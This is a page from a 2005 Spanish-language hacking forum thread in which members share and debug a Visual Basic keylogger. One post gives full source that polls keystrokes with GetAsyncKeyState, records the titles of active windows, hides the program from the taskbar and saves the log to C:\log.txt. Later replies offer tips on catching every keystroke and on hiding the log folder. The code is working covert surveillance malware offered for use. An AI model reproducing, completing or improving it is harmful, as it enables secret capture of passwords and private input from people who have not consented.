elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  keylogger en VB
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] 3 Ir Abajo Respuesta Imprimir
Autor Tema: keylogger en VB  (Leído 30,421 veces)
NYlOn


Desconectado Desconectado

Mensajes: 842


OOOOHHHHHH, TARAGÜIIII xDDDDDD


Ver Perfil WWW
Re: keylogger en VB
« Respuesta #10 en: 21 Septiembre 2005, 01:00 am »

el error es por el "Option Explicit"
como no tenes la X declarada te tira un error
hace esto:
abajo de las delcaraciones pone:
Código:
Dim x As Integer

o saca el Option Explicit

y te recomiendo que leas el post de Variables y Constantes ... no saber declarar una variable es muy grave xDDD
salu2


« Última modificación: 21 Septiembre 2005, 01:03 am por NYlOn » En línea

Bourne Ultimatum


Desconectado Desconectado

Mensajes: 382



Ver Perfil WWW
Re: keylogger en VB
« Respuesta #11 en: 21 Septiembre 2005, 01:06 am »

Muchisimas gracias
x la ayuda ;)


En línea

"El pertenecia a esa clase singular de hombres que la especie produce rara vez,
en quienes el ansia de poder ilimitado es tan extremo que para conseguirlo
cualquier sufrimiento parece natural" Ernesto CHE Guevara

http://www.desdeabajorugby.com.ar
NYlOn


Desconectado Desconectado

Mensajes: 842


OOOOHHHHHH, TARAGÜIIII xDDDDDD


Ver Perfil WWW
Re: keylogger en VB
« Respuesta #12 en: 21 Septiembre 2005, 01:11 am »

de nada :)
En línea

kakinets


Desconectado Desconectado

Mensajes: 414


[>Argentina<]


Ver Perfil
Re: keylogger en VB
« Respuesta #13 en: 21 Septiembre 2005, 02:15 am »

Hola este es un Keylogger muy bueno:

usa 2 timer, un texbox

Codigos:

Código:
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Declare Function GetKeyState Lib "user32" (ByVal nVirtKey As Long) As Integer
Private Declare Function GetForegroundWindow Lib "user32" () As Long
Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Private Declare Function GetWindowTextLength Lib "user32" Alias "GetWindowTextLengthA" (ByVal hwnd As Long) As Long
Private LastWindow As String
Private LastHandle As Long
Private dKey(255) As Long
Private Const VK_SHIFT = &H10
Private Const VK_CTRL = &H11
Private Const VK_ALT = &H12
Private Const VK_CAPITAL = &H14
Private ChangeChr(255) As String
Private AltDown As Boolean


Timer1:

Código:
'Cualto alt no este precionada
If GetAsyncKeyState(VK_ALT) = 0 And AltDown = True Then
AltDown = False
Text7 = Text7 & "[ALTUP]"
End If

'a-z A-Z

For i = Asc("A") To Asc("Z") 'Bucle que va desde 65 a 90
 If GetAsyncKeyState(i) = -32767 Then
 TypeWindow
 
  If GetAsyncKeyState(VK_SHIFT) < 0 Then
   If GetKeyState(VK_CAPITAL) > 0 Then
 Text7 = Text7 & LCase(Chr(i))
   Exit Sub
   Else
   Text7 = Text7 & UCase(Chr(i))
   Exit Sub
   End If
  Else
   If GetKeyState(VK_CAPITAL) > 0 Then
   Text7 = Text7 & UCase(Chr(i))
   Exit Sub
   Else
  Text7 = Text7 & LCase(Chr(i))
   Exit Sub
   End If
  End If
           
 End If
Next

'1234567890)(*&^%$#@!

For i = 48 To 57 'Bucle para registrar los numeros
 If GetAsyncKeyState(i) = -32767 Then
 TypeWindow
 
  If GetAsyncKeyState(VK_SHIFT) < 0 Then
  Text7 = Text7 & ChangeChr(i)
  Exit Sub
  Else
 Text7 = Text7 & Chr(i)
  Exit Sub
  End If
 
 End If
Next


';=,-./
For i = 186 To 192
 If GetAsyncKeyState(i) = -32767 Then
 TypeWindow
 
  If GetAsyncKeyState(VK_SHIFT) < 0 Then
 Text7 = Text7 & ChangeChr(i - 100)
  Exit Sub
  Else
  Text7 = Text7 & ChangeChr(i)
  Exit Sub
  End If
 
 End If
Next


'[\]'
For i = 219 To 222
 If GetAsyncKeyState(i) = -32767 Then
 TypeWindow
 
  If GetAsyncKeyState(VK_SHIFT) < 0 Then
 Text7 = Text7 & ChangeChr(i - 100)
  Exit Sub
  Else
  Text7 = Text7 & ChangeChr(i)
  Exit Sub
  End If
 
 End If
Next

'Bloque numerico
For i = 96 To 111
 If GetAsyncKeyState(i) = -32767 Then
 TypeWindow
 
  If GetAsyncKeyState(VK_ALT) < 0 And AltDown = False Then
  AltDown = True
  Text7 = Text7 & "[ALTDOWN]"
  Else
   If GetAsyncKeyState(VK_ALT) >= 0 And AltDown = True Then
   AltDown = False
   Text7 = Text7 & "[ALTUP]"
   End If
  End If
 
  Text7 = Text7 & ChangeChr(i)
  Exit Sub
 End If
Next

 'for space
 If GetAsyncKeyState(32) = -32767 Then
 TypeWindow
  Text7 = Text7 & " "
 End If

 'Cuando se precione ENTER
 If GetAsyncKeyState(13) = -32767 Then
 TypeWindow
 Text7 = Text7 & vbCrLf & "Enter " ' Se le inserta un salto de linea al texto y un caracter
  'de identificacion (Alt+ 0160)
 End If
 
 
 If GetAsyncKeyState(8) = -32767 Then
 TypeWindow
 If (Right(Text7.Text, 1) = " ") Then GoTo nod 'Si es ultimo caracter es ANSI 160 no se borra nada
 tip = Len(Text7.Text) - 1 'Logitud del texto menos uno
  Text7 = Left(Text7.Text, tip) 'Borrado
nod:
 End If
 
 'Cuando se precione felcha izquierda
 If GetAsyncKeyState(37) = -32767 Then
 TypeWindow
  Text7 = Text7 & "[LeftArrow]"
 End If
 
 'Cuando se precione felcha Arriba
 If GetAsyncKeyState(38) = -32767 Then
 TypeWindow
  Text7 = Text7 & "[UpArrow]"
 'End If
 
'Cuando se precione flecha derechar
If GetAsyncKeyState(39) = -32767 Then
TypeWindow
 Text7 = Text7 & "[RightArrow]"
 End If
 
  'Cuando se precione flecha abajo
 If GetAsyncKeyState(40) = -32767 Then
 TypeWindow
 Text7 = Text7 & "[DownArrow]"
 End If

 'tab
 If GetAsyncKeyState(9) = -32767 Then
 TypeWindow
  Text7 = Text7 & "[Tab]"
 End If
 
  'escape
 If GetAsyncKeyState(27) = -32767 Then
 TypeWindow
 Text7 = Text7 & "[Escape]"
 End If

 'insert, delete
 For i = 45 To 46
 If GetAsyncKeyState(i) = -32767 Then
 TypeWindow
 Text7 = Text7 & ChangeChr(i)
 End If
 Next

 'page up, page down, end, home
 For i = 33 To 36
 If GetAsyncKeyState(i) = -32767 Then
 TypeWindow
 Text7 = Text7 & ChangeChr(i)
 End If
 Next
 
 ' Left Click
 If GetAsyncKeyState(1) = -32767 Then
  If (LastHandle = GetForegroundWindow) And LastHandle <> 0 Then 'we make sure that click is on the page that we are loging bute click log start when we type something in window
 Text7 = Text7 & "[LeftClick]"
 End If
 End If
 End If

Timer2:

Código:
GurdaLog


Formulario:

Código:
If App.PrevInstance = True Then: End 'Para que no existan dos programas corriendo al mismo tiempo
App.TaskVisible = False ' Nada de mostrarse en la barra de tareas

LeeLog 'Funcion que lee el archivo de log
Me.Caption = "Keylogger"
ChangeChr(33) = "[PageUp]"
ChangeChr(34) = "[PageDown]"
ChangeChr(35) = "[End]"
ChangeChr(36) = "[Home]"

ChangeChr(45) = "[Insert]"
ChangeChr(46) = "[Delete]"

ChangeChr(48) = "="
ChangeChr(49) = "!"
ChangeChr(50) = "@"
ChangeChr(51) = "#"
ChangeChr(52) = "$"
ChangeChr(53) = "%"
ChangeChr(54) = "&"
ChangeChr(55) = "/"
ChangeChr(56) = "("
ChangeChr(57) = ")"

ChangeChr(186) = "`"
ChangeChr(187) = "+"
ChangeChr(188) = ","
ChangeChr(189) = "-"
ChangeChr(190) = "."
ChangeChr(191) = "}"

ChangeChr(219) = "{" '
ChangeChr(220) = "\"
ChangeChr(221) = "¡"
ChangeChr(222) = "{"


ChangeChr(86) = "^"
ChangeChr(87) = "*"
ChangeChr(88) = ";"
ChangeChr(89) = "_"
ChangeChr(90) = ":"
ChangeChr(91) = "?"

ChangeChr(119) = "?"
ChangeChr(120) = "|"
ChangeChr(121) = "¿"
ChangeChr(122) = """"


ChangeChr(96) = "0"
ChangeChr(97) = "1"
ChangeChr(98) = "2"
ChangeChr(99) = "3"
ChangeChr(100) = "4"
ChangeChr(101) = "5"
ChangeChr(102) = "6"
ChangeChr(103) = "7"
ChangeChr(104) = "8"
ChangeChr(105) = "9"
ChangeChr(106) = "*"
ChangeChr(107) = "+"
ChangeChr(109) = "-"
ChangeChr(110) = "."
ChangeChr(111) = "/"

ChangeChr(192) = "ñ"
ChangeChr(92) = "Ñ"


Declarasiones en Generales:

Código:
Public Function Logged(FromFile As String) As String 'Lee el texto contenido dentro de C:\log.txt
On Error GoTo Handle
Dim sTemp As String
    Open FromFile For Input As #1   'Abre el archivo para leerlo
        sTemp = Input(LOF(1), 1)    'Obtiene el texto
    Close #1                        'Cierra el archivo
    Logged = sTemp
Exit Function
Handle:
'MsgBox "Error " & Err.Number & vbCrLf & Err.Description, vbCritical, "Error"
End Function


Function TypeWindow() 'Imprime el titulo de la ventana activa
Dim Handle As Long
Dim textlen As Long
Dim WindowText As String

Handle = GetForegroundWindow
LastHandle = Handle
textlen = GetWindowTextLength(Handle) + 1

WindowText = Space(textlen)
svar = GetWindowText(Handle, WindowText, textlen)
WindowText = Left(WindowText, Len(WindowText) - 1)

If WindowText <> LastWindow Then 'Si el ultimo titulo de la ventana activa es directe alde la actual
' se imprime el nuevo titulo de la ventana
If Text7 <> "" Then Text7 = Text7 & vbCrLf & vbCrLf
Text7 = Text7 & "|====================" & Now & "=======================|" & vbCrLf & WindowText & vbCrLf & "|============================================================|" & vbCrLf & " " 'Se eimprime el titulo de la aplicacion, fecha y hora =P
LastWindow = WindowText 'El ultimo titulo de la ventana
End If
End Function


Sub LeeLog()
Text7.Text = Logged("C:\log.txt") 'Se carga el texto en el objeto text
End Sub

Sub GurdaLog()
Open ("C:\log.txt") For Output As #1 ' Se abre el archivo
Print #1, Text7.Text ' se sobre escribe el log
Close #1 ' y se cierra
End Sub


Espero q les Sirve es muy Bueno....
En línea

Slasher-K


Desconectado Desconectado

Mensajes: 1.477


Ver Perfil
Re: keylogger en VB
« Respuesta #14 en: 21 Septiembre 2005, 08:27 am »

no eso lo veo
pero como la declaroo

saludos

Por favor... mejor me  :-X
En línea



A la reina de las profundidades que cuida los pasos de una sombra en la noche :*
NYlOn


Desconectado Desconectado

Mensajes: 842


OOOOHHHHHH, TARAGÜIIII xDDDDDD


Ver Perfil WWW
Re: keylogger en VB
« Respuesta #15 en: 21 Septiembre 2005, 09:10 am »

muy bueno el code Pedronets
me gusto eso de:
Código:
If Text7 <> "" Then Text7 = Text7 & vbCrLf & vbCrLf
Text7 = Text7 & "|====================" & Now & "=======================|" & vbCrLf & WindowText & vbCrLf & "|============================================================|" & vbCrLf & " " 'Se eimprime el titulo de la aplicacion, fecha y hora =P
LastWindow = WindowText 'El ultimo titulo de la ventana
End If

ACLARACION: te olvidaste de mencionar que el TxtBox deberia llamares Text7 (o podes cambiar el codigo xD)

un slaud0 y gracias x el c0de ;)

G0nz4
En línea

^Winder^


Desconectado Desconectado

Mensajes: 2.776


El mundo no es tuyo, es de todos.


Ver Perfil
Re: keylogger en VB
« Respuesta #16 en: 21 Septiembre 2005, 11:18 am »

referente al primer keylogger:

Akellos k abeis probado el primer keylogger y abeis estado encontrando esos errores d compilacion y solucionados...podeis publicar ahora como kedaría el código sin errores de compilacion ni d ningun tipo?  ;)
En línea


Yo apoyo la esperanza de Caylees. Frenemos la Leucemia:
www.cayleeshope.com
Libertad conquistada.  (Justicia ;-))
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: keylogger en VB
« Respuesta #17 en: 21 Septiembre 2005, 12:36 pm »

Yo no lo he llegado a probar, pero... ¿me podriais decir se este keylogger se come letras como en muchos otros?
En línea

LaN

Desconectado Desconectado

Mensajes: 62


Ver Perfil
Re: keylogger en VB
« Respuesta #18 en: 21 Septiembre 2005, 13:03 pm »

¡Muy buen keylogger el de Pedronets!

El único problema que le he encontrado es que los acentos los guarda el log como '{', es decir si yo escribo por ejemplo 'opción' en el log se ve 'opci{on'. De todos modos esta realmente bien.

Respecto a lo de comerse las letras:
Pone al Timer1 un Interval bajo y al Timer2 un minuto o 30 seg para que vaya guardando el log. ;)
En línea

LaN

Desconectado Desconectado

Mensajes: 62


Ver Perfil
Re: keylogger en VB
« Respuesta #19 en: 21 Septiembre 2005, 13:20 pm »

Como yo aún estoy aprendiendo VB soluciono las cosas brutamente, y "escondí" el log así:

Código:
En el load del form
On Error GoTo yaexiste
Set carpeta = CreateObject("scripting.filesystemobject")
carpeta.CreateFolder "C:\Archivos de Programa\Klog"
yaexiste:
..etc..

para que me crease una carpeta donde guardar el log.
Mi pregunta es ¿Como se haría esto correctamente? Es decir, ¿como le digo que si existe la carpeta no haga nada? Así funciona pero hace daño a los ojos al verlo.. :-\
En línea

Páginas: 1 [2] 3 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
keylogger
Scripting
Panic0 1 2,407 Último mensaje 6 Agosto 2020, 08:15 am
por Gabriela
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines